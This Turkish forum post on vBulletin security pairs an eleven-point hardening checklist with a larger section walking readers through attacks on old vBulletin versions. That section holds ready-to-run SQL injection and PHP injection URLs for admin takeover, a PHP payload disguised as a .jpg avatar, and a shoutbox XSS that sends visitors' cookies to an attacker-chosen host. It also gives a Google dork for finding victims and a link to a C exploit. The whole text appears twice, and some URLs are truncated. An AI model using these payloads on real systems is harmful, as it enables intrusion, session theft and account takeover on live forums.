Burada forumunuzu en yüksek güvenlik seviyesinde tutmanız için gereken TEMEL şeyleri sıralıyorum. Eminim profesyonel Vbulletin kullanıcıları aşağıda sıralayacaklarımı biliyorlardır ama Vbulletine yeni başlayanların pek bildiklerini söyleyemeyeceğim. Tabii ki hacklenemez diye bir şey söz konusu değil ama aşağıdaki şeyleri uygularsanız forumunuz %80 daha güvenli olacaktır.
1-) Forumunuzu daima en yüksek sürümlere upgrade edin.
2-) Hiç bir hack ve plugin yüklemeyin (Özellikle PHP dosyalarından değişiklik yapılanları). Tertemiz bir Vbulletini hacklemek neredeyse imkansızdır. Oluşan açıklar genelde yaptığınız eklentilerden ve hostunuzdan kaynaklanır.
3-) Admin ve mod kontrol panellerinin şifrelerini koruyun. Ayrıntılı (İngilizce) açıklamaya buradan ulaşabilirsiniz.
4-) Tools.php dosyasının (vB3) websitenizde bulunmadığından emin olun. Bu dosya kesinlikle upload edilmemelidir. İşi bittikten sonra silinmelidir.
5-) phpMyAdmin kullanıyorsanız, giriş kısmının şifrelendiğinden emin olun. Aksi taktirde herkes ulaşabilir.
6-) Herhangi bir saldırıdan sonra tüm cpanel, FTP ve admin şifrelerinizi değiştirin.
7-) Admin ve mod şifrelerinin en az 9-10 karakter olmasına, bu karakterlerin sayı ve harflerden oluşmasına dikkat edin. Şifreleriniz MD5 şeklinde şifrelendiği için hem harf hemde rakamla oluşan 10 karakterli bir şifrenin çözülmesi imkasız bile olabilir.
FORUMUNUZDA ASLA HTML KULLANIMINA İZİN VERMEYİN.
9-) Forumunuzu kurduktan sonra install klasörünüdeki install.php ve upgrade1.php adlı dosyaları silin.
10-) Sitenizi sağlam hostlara kurun. Forumunuz ne kadar güvenli olursa olsun hostunuz saldırı yediği zaman sizde etkileneceksiniz.
11-) Sık sık DATABASE yedeği alın. Bazı Hosting firmaları her gün yedek alım işlemlerini gerçekleştirmektedir. Ben günde 3-4 kez yedek alıyorum. Böylece saldırı yiyip, tablolara ve foruma herhangi bir zarar gelirse 4-5 saatlik zararla atlatıyorum.
Ben bu işlemlerin hepsini uyguluyorum. Siteme ne saldırı geldiyse hostun zayıflığı yüzünden geldi. O yüzden sağlam hostlar seçin. Her zaman en güvenli hostlar FREE hostlardır.
-------->
Bu kısımı forumda daha önce yazmıştım ama bu dökümanın içinde de olması daha uygun oldu...
-------->
Vbulletine Karşı Yapılabilecek Saldırılar;
Not: Aslında bu kısım hacking ağırlıklı ama bir hacker gibi düşünmeden kendinizi hackerlerden koruyamazsınız. Bu yazıyı hazırlamamın sebebi çoğu arkadaşımızın lamerler tarafından hacklenmesidir. Ve hangi açıklar yüzünden hacklendiklerini bilmemeleridir. Ayrıca acemilerin bazı yerleri anlamayacaklarını tahmin ediyorum. Sormak istediğiniz yerler olursa sorabilirsiniz.
Yazımın bundan sonraki bölümü hackerleri daha çok ilgilendiriyor J Şimdi başlıklar halinde sizlere Vbulletinin birçok açığını anlatacağım; [NOT: Bazı açıklar çok eski olduğu için hedef site bulmak zor olabilir] Öncelikle SQL Enjeksiyon, RFI ve exploit açıkları ile başlıyorum;
1-) LAST.PHP Dosyasını SQL Enjeksiyona Uğratmak;
http://www.hedefsite.com/last.php?fs...TiTle,user.%20 (http://www.hedefsite.com/last.php?fs...TiTle,user. ) %20%20%20username%20as%20lastposter%20FROM%20user, thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201
Hedef site yerine hedef sitenizin adresini yazın ve URLyi browserda çalıştırın. Eğer açık mevcutsa siteye admin olarak giriş yapabileceksiniz.
Açık Bulunma Tarihi: 2004-11-15
2-) MISC.PHP Dosyasını PHP Enjeksiyonuna Uğratmak;
Önemli : Vbulletin 3.06 sürümü aşağısı için geçerlidir. 3.0.1de test edilmiştir.
http://hedefsite.com/misc.php?do=page&...36;{phpinfo()}}
Hedefsite kısmına saldırı yapacağınız siteyi yazıp URLyi browserda çalıştırın.
Açık Bulunma Tarihi: 2005-02-22
3-) Avatarların İçine Kod Gizleyerek Üyeleri Log-out etmek [ =<---3.0.7 versiyon]
<?php
header("********: ;" target="_blank">http://www.site.com/forum/login.php?logout=true";
exit;
?>
Site.com yazan yere hedef sitenin adresini yazın. Ve kodu .jpg olarak kaydedin. Kaydetdiğiniz bu jpgyi avatarınızı olarak upload edin. Şimdi mesajlarınızı görüntüleyen herkes otomatik olarak logout olacaktır.
4-) Shoutbox Açığı;
Vbulletinin eklentilerinden olan Shoutbox yani chatleşme modülünde HTML kodu aktifse yani kullanılabiliyorsa şu kodu shout [chat mesajı] olarak gönderin.
<pre a=> onmouseover=********.********="http://www.yönlenecekadres.com?c="+********.cookie b=</pre >
Yönlenecekadres.com yerine sitenin yönlenmesini istediği yeri yazın. HTML kodu aktifse site verdiğiniz adrese yönlenecektir. Tüm Vbulletin [3.5.4 dışında] için geçerlidir, yeter ki HTML kullanımı aktif olsun.
Google Araması: /vbshout.php?do=archive
5-) Siteye Admin veya Mod Olarak Giriş Yapmak [ <--- 3.0.0]
http://www.xxx.com/admincp/index.php?vb_lo...min_Nicki"
http://www.xxx.com/modcp/index.php?vb_logi...Mod_Nicki"
Şimdi xxx.com yerine hedefsitemizi yazıyoruz. Admin veya mod nickini yazıyoruz. Sonra bu linki browserda çalıştırıyoruz. Aaa birde bakmışız, yazdığımız admin nicki ile admincp veya modcpye giriş yapmışız. 3.0.0 veya alt sürümleri için geçerlidir.
6-) Upgrade1.php Açığı:
Forumunuzu upgrade ederken install klasörü içinde upgrade1.php dosyası oluşur. Eğer admin upgrade sonrası bu dosyayı silmemişse Vbulletin tablolarına, dolayısı ile user tablesindeki MD5 şeklinde kriptolanmış admin şifrelerine ulaşabilirsiniz.
www.hedef.com/forum/install/upgrade1.php (http://www.hedef.com/forum/install/upgrade1.php)
Hedef yerine hedef sitesinizi yazıp URLyi browserda çalıştırın. Açık varsa tablolara ulaşabilirsiniz. Bir ara bu açık benim sitemde de vardı. 3.0.9 için tarafımca test edilmiştir yani J Sanırım tüm sürümler için geçerli...
7-) Admincpden Alınan Yedekleri Bulmak [<-- 3.0.8]:
Admincpden alınan yedekler doğruca .sql şeklinde FTPye yollanır. Şimdi vereceğim exploit ile bu yedeklerin yerlerini bulabilecek, dolayısı ile yedeği indirebileceksiniz. Yedeği indirip user tablosundaki adminin şifresini kırıp admincpye ulaşabilirsiniz. Exploit C exploitidir. Şimdi exploit nasıl kullanılır onu anlatmayacağım, öncelikle compile etmeniz gerekiyor...
Exploit linki: http://www.xxxx.com/Vbulletin_p...r_exploit1.txt (http://www.xxxx.com/Vbulletin_p...r_exploit1.txt)
Bu exploiti kullanarak dediğim gibi admincp aracılığı ile alınan yedekleri bulup, indirebilirsiniz.
MKPortal ile Entegrasyon Edilmiş Vbulletinleri Hacklemek;
MKPortal 1.1 ile entegre edilmiş tüm Vbulletin versiyonları için geçerlidir. Kullanımı şu şekildedir;
http://[hedef.com]/index.php?ind= (http://[hedef.com]/index.php?ind:)[SQL]
SQL yerine herhangi bir SQL kodu yazabilirsiniz. Mesela;
http://hedef.com/index.php?ind=,userid=1 (http://hedef.com/index.php?ind=,userid=1)
Bu kodu browserda çalıştırırsanız siteye admin olarak giriş yaparsınız. Ayrıca XSS açığıda mevcuttur;
http://[hedef.com]/includes/pm_popup.php?u1= (http://[hedef.com]/includes/pm_popup.php?u1:)[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS]
Bu URLyi ise browserda çalıştırarak XSS saldırısı gerçekleştirebilirsiniz. URLdeki XSS yazan kısımları editlemeniz gerekiyor.
1-) Forumunuzu daima en yüksek sürümlere upgrade edin.
2-) Hiç bir hack ve plugin yüklemeyin (Özellikle PHP dosyalarından değişiklik yapılanları). Tertemiz bir Vbulletini hacklemek neredeyse imkansızdır. Oluşan açıklar genelde yaptığınız eklentilerden ve hostunuzdan kaynaklanır.
3-) Admin ve mod kontrol panellerinin şifrelerini koruyun. Ayrıntılı (İngilizce) açıklamaya buradan ulaşabilirsiniz.
4-) Tools.php dosyasının (vB3) websitenizde bulunmadığından emin olun. Bu dosya kesinlikle upload edilmemelidir. İşi bittikten sonra silinmelidir.
5-) phpMyAdmin kullanıyorsanız, giriş kısmının şifrelendiğinden emin olun. Aksi taktirde herkes ulaşabilir.
6-) Herhangi bir saldırıdan sonra tüm cpanel, FTP ve admin şifrelerinizi değiştirin.
7-) Admin ve mod şifrelerinin en az 9-10 karakter olmasına, bu karakterlerin sayı ve harflerden oluşmasına dikkat edin. Şifreleriniz MD5 şeklinde şifrelendiği için hem harf hemde rakamla oluşan 10 karakterli bir şifrenin çözülmesi imkasız bile olabilir.
FORUMUNUZDA ASLA HTML KULLANIMINA İZİN VERMEYİN. 9-) Forumunuzu kurduktan sonra install klasörünüdeki install.php ve upgrade1.php adlı dosyaları silin.
10-) Sitenizi sağlam hostlara kurun. Forumunuz ne kadar güvenli olursa olsun hostunuz saldırı yediği zaman sizde etkileneceksiniz.
11-) Sık sık DATABASE yedeği alın. Bazı Hosting firmaları her gün yedek alım işlemlerini gerçekleştirmektedir. Ben günde 3-4 kez yedek alıyorum. Böylece saldırı yiyip, tablolara ve foruma herhangi bir zarar gelirse 4-5 saatlik zararla atlatıyorum.
Ben bu işlemlerin hepsini uyguluyorum. Siteme ne saldırı geldiyse hostun zayıflığı yüzünden geldi. O yüzden sağlam hostlar seçin. Her zaman en güvenli hostlar FREE hostlardır.
-------->
Bu kısımı forumda daha önce yazmıştım ama bu dökümanın içinde de olması daha uygun oldu...
-------->
Vbulletine Karşı Yapılabilecek Saldırılar;
Not: Aslında bu kısım hacking ağırlıklı ama bir hacker gibi düşünmeden kendinizi hackerlerden koruyamazsınız. Bu yazıyı hazırlamamın sebebi çoğu arkadaşımızın lamerler tarafından hacklenmesidir. Ve hangi açıklar yüzünden hacklendiklerini bilmemeleridir. Ayrıca acemilerin bazı yerleri anlamayacaklarını tahmin ediyorum. Sormak istediğiniz yerler olursa sorabilirsiniz.
Yazımın bundan sonraki bölümü hackerleri daha çok ilgilendiriyor J Şimdi başlıklar halinde sizlere Vbulletinin birçok açığını anlatacağım; [NOT: Bazı açıklar çok eski olduğu için hedef site bulmak zor olabilir] Öncelikle SQL Enjeksiyon, RFI ve exploit açıkları ile başlıyorum;
1-) LAST.PHP Dosyasını SQL Enjeksiyona Uğratmak;
http://www.hedefsite.com/last.php?fs...TiTle,user.%20 (http://www.hedefsite.com/last.php?fs...TiTle,user. ) %20%20%20username%20as%20lastposter%20FROM%20user, thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201
Hedef site yerine hedef sitenizin adresini yazın ve URLyi browserda çalıştırın. Eğer açık mevcutsa siteye admin olarak giriş yapabileceksiniz.
Açık Bulunma Tarihi: 2004-11-15
2-) MISC.PHP Dosyasını PHP Enjeksiyonuna Uğratmak;
Önemli : Vbulletin 3.06 sürümü aşağısı için geçerlidir. 3.0.1de test edilmiştir.
http://hedefsite.com/misc.php?do=page&...36;{phpinfo()}}
Hedefsite kısmına saldırı yapacağınız siteyi yazıp URLyi browserda çalıştırın.
Açık Bulunma Tarihi: 2005-02-22
3-) Avatarların İçine Kod Gizleyerek Üyeleri Log-out etmek [ =<---3.0.7 versiyon]
<?php
header("********: ;" target="_blank">http://www.site.com/forum/login.php?logout=true";
exit;
?>
Site.com yazan yere hedef sitenin adresini yazın. Ve kodu .jpg olarak kaydedin. Kaydetdiğiniz bu jpgyi avatarınızı olarak upload edin. Şimdi mesajlarınızı görüntüleyen herkes otomatik olarak logout olacaktır.
4-) Shoutbox Açığı;
Vbulletinin eklentilerinden olan Shoutbox yani chatleşme modülünde HTML kodu aktifse yani kullanılabiliyorsa şu kodu shout [chat mesajı] olarak gönderin.
<pre a=> onmouseover=********.********="http://www.yönlenecekadres.com?c="+********.cookie b=</pre >
Yönlenecekadres.com yerine sitenin yönlenmesini istediği yeri yazın. HTML kodu aktifse site verdiğiniz adrese yönlenecektir. Tüm Vbulletin [3.5.4 dışında] için geçerlidir, yeter ki HTML kullanımı aktif olsun.
Google Araması: /vbshout.php?do=archive
5-) Siteye Admin veya Mod Olarak Giriş Yapmak [ <--- 3.0.0]
http://www.xxx.com/admincp/index.php?vb_lo...min_Nicki"
http://www.xxx.com/modcp/index.php?vb_logi...Mod_Nicki"
Şimdi xxx.com yerine hedefsitemizi yazıyoruz. Admin veya mod nickini yazıyoruz. Sonra bu linki browserda çalıştırıyoruz. Aaa birde bakmışız, yazdığımız admin nicki ile admincp veya modcpye giriş yapmışız. 3.0.0 veya alt sürümleri için geçerlidir.
6-) Upgrade1.php Açığı:
Forumunuzu upgrade ederken install klasörü içinde upgrade1.php dosyası oluşur. Eğer admin upgrade sonrası bu dosyayı silmemişse Vbulletin tablolarına, dolayısı ile user tablesindeki MD5 şeklinde kriptolanmış admin şifrelerine ulaşabilirsiniz.
www.hedef.com/forum/install/upgrade1.php (http://www.hedef.com/forum/install/upgrade1.php)
Hedef yerine hedef sitesinizi yazıp URLyi browserda çalıştırın. Açık varsa tablolara ulaşabilirsiniz. Bir ara bu açık benim sitemde de vardı. 3.0.9 için tarafımca test edilmiştir yani J Sanırım tüm sürümler için geçerli...
7-) Admincpden Alınan Yedekleri Bulmak [<-- 3.0.8]:
Admincpden alınan yedekler doğruca .sql şeklinde FTPye yollanır. Şimdi vereceğim exploit ile bu yedeklerin yerlerini bulabilecek, dolayısı ile yedeği indirebileceksiniz. Yedeği indirip user tablosundaki adminin şifresini kırıp admincpye ulaşabilirsiniz. Exploit C exploitidir. Şimdi exploit nasıl kullanılır onu anlatmayacağım, öncelikle compile etmeniz gerekiyor...
Exploit linki: http://www.xxxx.com/Vbulletin_p...r_exploit1.txt (http://www.xxxx.com/Vbulletin_p...r_exploit1.txt)
Bu exploiti kullanarak dediğim gibi admincp aracılığı ile alınan yedekleri bulup, indirebilirsiniz.
MKPortal ile Entegrasyon Edilmiş Vbulletinleri Hacklemek;MKPortal 1.1 ile entegre edilmiş tüm Vbulletin versiyonları için geçerlidir. Kullanımı şu şekildedir;
http://[hedef.com]/index.php?ind= (http://[hedef.com]/index.php?ind:)[SQL]
SQL yerine herhangi bir SQL kodu yazabilirsiniz. Mesela;
http://hedef.com/index.php?ind=,userid=1 (http://hedef.com/index.php?ind=,userid=1)
Bu kodu browserda çalıştırırsanız siteye admin olarak giriş yaparsınız. Ayrıca XSS açığıda mevcuttur;
http://[hedef.com]/includes/pm_popup.php?u1= (http://[hedef.com]/includes/pm_popup.php?u1:)[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS]
Bu URLyi ise browserda çalıştırarak XSS saldırısı gerçekleştirebilirsiniz. URLdeki XSS yazan kısımları editlemeniz gerekiyor.
